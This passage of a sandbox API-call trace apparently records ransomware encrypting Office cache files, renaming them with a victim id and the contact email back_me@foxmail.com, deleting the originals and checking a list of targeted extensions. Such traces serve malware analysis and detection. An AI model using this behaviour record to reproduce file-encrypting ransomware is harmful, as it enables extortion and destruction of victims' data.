users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0039.513] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.513] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0039.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.514] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0039.514] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.514] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.721] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.721] ReadFile (in: hFile=0x1e8, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.726] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.726] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0039.726] ReadFile (in: hFile=0x1e8, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.832] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.832] WriteFile (in: hFile=0x1e8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0040.158] SetEndOfFile (hFile=0x1e8) returned 1 [0040.158] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0040.158] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.158] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.159] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.159] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.161] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0040.161] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.163] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0040.163] CloseHandle (hObject=0x1e8) returned 1 [0042.387] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0042.387] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.387] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.387] lstrlenW (lpString=".doc") returned 4 [0042.387] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.387] lstrlenW (lpString=".docx") returned 5 [0042.387] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.387] lstrlenW (lpString=".pdf") returned 4 [0042.387] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.387] lstrlenW (lpString=".xls") returned 4 [0042.387] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString=".xlsx") returned 5 [0042.388] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.388] lstrlenW (lpString=".ppt") returned 4 [0042.388] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString=".zip") returned 4 [0042.388] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString=".rar") returned 4 [0042.388] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString=".bz2") returned 4 [0042.388] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.388] lstrlenW (lpString=".7z") returned 3 [0042.388] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString=".dbf") returned 4 [0042.388] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString=".1cd") returned 4 [0042.388] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString=".jpg") returned 4 [0042.388] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.388] lstrlenW (lpString=".doc") returned 4 [0042.388] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString=".docx") returned 5 [0042.388] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.388] lstrlenW (lpString=".pdf") returned 4 [0042.388] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.388] lstrlenW (lpString=".xls") returned 4 [0042.389] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.389] lstrlenW (lpString=".xlsx") returned 5 [0042.389] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.389] lstrlenW (lpString=".ppt") returned 4 [0042.389] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.389] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.389] lstrlenW (lpString=".zip") returned 4 [0042.389] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.389] lstrlenW (lpString=".rar") returned 4 [0042.389] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.389] lstrlenW (lpString=".bz2") returned 4 [0042.389] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.389] lstrlenW (lpString=".7z") returned 3 [0042.389] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.389] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.389] lstrlenW (lpString=".dbf") returned 4 [0042.389] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.389] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.389] lstrlenW (lpString=".1cd") returned 4 [0042.389] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.389] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0042.389] lstrlenW (lpString=".jpg") returned 4 [0042.389] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.389] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0042.389] lstrlenW (lpString="Proof.msi") returned 9 [0042.389] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0042.390] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=885760) returned 1 [0042.390] CloseHandle (hObject=0x1e8) returned 1 [0042.390] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0042.390] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.390] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0042.390] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.390] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.390] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.390] GetLastError () returned 0x0 [0042.390] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xd8400, lpOverlapped=0x0) returned 1 [0042.468] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xd8410, lpOverlapped=0x0) returned 1 [0042.815] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0042.816] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.816] SetEndOfFile (hFile=0x1b0) returned 1 [0042.816] CloseHandle (hObject=0x1b0) returned 1 [0042.823] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.823] SetEndOfFile (hFile=0x1e8) returned 1 [0042.830] CloseHandle (hObject=0x1e8) returned 1 [0042.831] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0042.831] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0042.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.831] lstrlenW (lpString=".doc") returned 4 [0042.831] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.831] lstrlenW (lpString=".docx") returned 5 [0042.831] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.831] lstrlenW (lpString=".pdf") returned 4 [0042.831] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString=".xls") returned 4 [0042.832] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString=".xlsx") returned 5 [0042.832] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.832] lstrlenW (lpString=".ppt") returned 4 [0042.832] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString=".zip") returned 4 [0042.832] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString=".rar") returned 4 [0042.832] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString=".bz2") returned 4 [0042.832] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.832] lstrlenW (lpString=".7z") returned 3 [0042.832] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString=".dbf") returned 4 [0042.832] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString=".1cd") returned 4 [0042.832] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString=".jpg") returned 4 [0042.832] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.832] lstrlenW (lpString=".doc") returned 4 [0042.832] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.832] lstrlenW (lpString=".docx") returned 5 [0042.832] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.832] lstrlenW (lpString=".pdf") returned 4 [0042.832] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.832] lstrlenW (lpString=".xls") returned 4 [0042.832] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.833] lstrlenW (lpString=".xlsx") returned 5 [0042.833] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.833] lstrlenW (lpString=".ppt") returned 4 [0042.833] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.833] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.833] lstrlenW (lpString=".zip") returned 4 [0042.833] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.833] lstrlenW (lpString=".rar") returned 4 [0042.833] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.833] lstrlenW (lpString=".bz2") returned 4 [0042.833] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.833] lstrlenW (lpString=".7z") returned 3 [0042.833] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.833] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.833] lstrlenW (lpString=".dbf") returned 4 [0042.833] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.833] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.833] lstrlenW (lpString=".1cd") returned 4 [0042.833] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.833] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.833] lstrlenW (lpString=".jpg") returned 4 [0042.833] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.833] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0042.833] lstrlenW (lpString="Proofing.msi") returned 12 [0042.833] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0042.834] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=868864) returned 1 [0042.834] CloseHandle (hObject=0x1e8) returned 1 [0042.834] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0042.834] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.834] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0042.834] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.834] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.834] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0042.834] GetLastError () returned 0x0 [0042.834] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xd4200, lpOverlapped=0x0) returned 1 [0042.851] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0043.179] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.179] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.179] SetEndOfFile (hFile=0x1b0) returned 1 [0043.179] CloseHandle (hObject=0x1b0) returned 1 [0043.186] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.186] SetEndOfFile (hFile=0x1e8) returned 1 [0043.193] CloseHandle (hObject=0x1e8) returned 1 [0043.193] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0043.194] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0043.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.194] lstrlenW (lpString=".doc") returned 4 [0043.194] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.194] lstrlenW (lpString=".docx") returned 5 [0043.194] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0043.194] lstrlenW (lpString=".pdf") returned 4 [0043.194] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.194] lstrlenW (lpString=".xls") returned 4 [0043.194] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.194] lstrlenW (lpString=".xlsx") returned 5 [0043.194] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0043.194] lstrlenW (lpString=".ppt") returned 4 [0043.194] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.194] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.194] lstrlenW (lpString=".zip") returned 4 [0043.194] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.194] lstrlenW (lpString=".rar") returned 4 [0043.194] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.194] lstrlenW (lpString=".bz2") returned 4 [0043.195] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString=".7z") returned 3 [0043.195] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString=".dbf") returned 4 [0043.195] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString=".1cd") returned 4 [0043.195] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString=".jpg") returned 4 [0043.195] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString=".doc") returned 4 [0043.195] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString=".docx") returned 5 [0043.195] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0043.195] lstrlenW (lpString=".pdf") returned 4 [0043.195] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.195] lstrlenW (lpString=".xls") returned 4 [0043.195] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.195] lstrlenW (lpString=".xlsx") returned 5 [0043.195] lstrcmpiW 